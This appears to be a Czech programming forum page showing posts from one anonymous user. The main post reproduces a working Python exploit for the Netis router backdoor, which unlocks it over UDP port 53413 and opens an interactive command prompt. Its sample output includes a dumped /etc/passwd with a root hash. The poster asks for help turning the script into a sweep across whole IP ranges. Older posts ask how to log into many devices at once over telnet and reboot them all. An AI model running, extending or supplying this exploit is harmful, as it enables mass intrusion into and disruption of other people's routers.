Anonymní profil foruman – Programujte.com
 x   TIP: Přetáhni ikonu na hlavní panel pro připnutí webu

Anonymní profil foruman – Programujte.comAnonymní profil foruman – Programujte.com

 

Příspěvky odeslané z IP adresy 94.74.192.–

foruman
Python › Python script exploit
24. 5. 2017   #216253

Ahoj pythonaci :-),

mám script, kterým bych potřeboval otestovat zranitelnost viz. níže, ale jde o to, že potřebuju projít celý pool IP adress, tedy ne pouze jednu (na kterou je scrip připrave). Jelikož spojení je iniciováno na UDP transportu, potřeboval bych na záver skriptu, poslat například příkaz "ls" a pokud druhá straná do 2 vteřin neodpoví, pokračovat na další IP adresu.

python script:


import socket
import argparse
import binascii
'''
Example run:
root@rageKali:/media/veracrypt1/stcyr/git/MSF-Testing-Scripts# python netis_backdoor.py 192.168.1.1
Unlocking Backdoor
Quit to quit loop
Netis> ls /tmp/
AuCVM
XqdHc
bVOQm
br_type
bridge_init
cfg-macclone
checkupfile
ddfile
default_rt
dhcpd_action
file.txt
hzbjo
igd_config.old
jiDOo
log
ntp_tmp
passwd
reg_domain
syslogd_support
tmp.txt
update_main
version
wan_type
workmode
Netis> cat /etc/passwd
root:abSQTPcIskFGc:0:0:root:/:/bin/sh
nobody:x:99:99:Nobody:/:
'''
parser = argparse.ArgumentParser(description='Netis backdoor')
parser.add_argument('IP', help='IP of router to connect to')
args = parser.parse_args()
def send(command, print_response = True):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#s.connect((args.IP, 53413))
s.sendto("AA\x00\x00AAAA%s\x00" %(command), (args.IP, 53413))
if print_response:
resp = s.recv(2048)
resp = resp[8:]
if binascii.hexlify(resp) == "000000ff":
print("No response, command not found or error in command")
else:
print(resp)
def login():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#s.connect((args.IP, 53413))
s.sendto("AAAAAAAAnetcore\x00", (args.IP, 53413))
print("Unlocking Backdoor")
login()
input = ""
print("Quit to quit loop")
input = raw_input("Netis> ").strip()
while not input.strip().upper() in ["QUIT","EXIT"]:
send(" " + input)
input = raw_input("Netis> ").strip()

Pomohl by mi s tím někdo, prosim ? Pro znalce Pythona to bude asi na deset minut...

IP adresy klidne mužou byt vyčítany z externího .txt, řádek po řádku, jestli je to jednodušší, než řešit ve skriptu generovaní ip adres dle poolu.

Děkuji.

ljanas
C / C++ › dotaz ohledně telnetu
20. 1. 2011   #137999

nebo popřípadě jak to má být napsané v Perlu

ljanas
C / C++ › dotaz ohledně telnetu
20. 1. 2011   #137998

To KIIV : Takže myslíte že v Cčku to není možné ?

ljanas
C / C++ › dotaz ohledně telnetu
20. 1. 2011   #137996

Ahoj chci se zepta jestli někdo neporadí jak má být napsaný program v C / C++ aby dělat toto :

potřebuji se pomocí telnetu přihlásit na více IP adres zároveň s následným zalogováním do všech zařízení.
To tomto zalogování bych potřeboval udělat reboot všech zařízení


Díky moc

 

 

Hostujeme u Českého hostingu       ISSN 1801-1586       ⇡ Nahoru Webtea.cz logo © 20032024 Programujte.com
Zasadilo a pěstuje Webtea.cz, šéfredaktor Lukáš Churý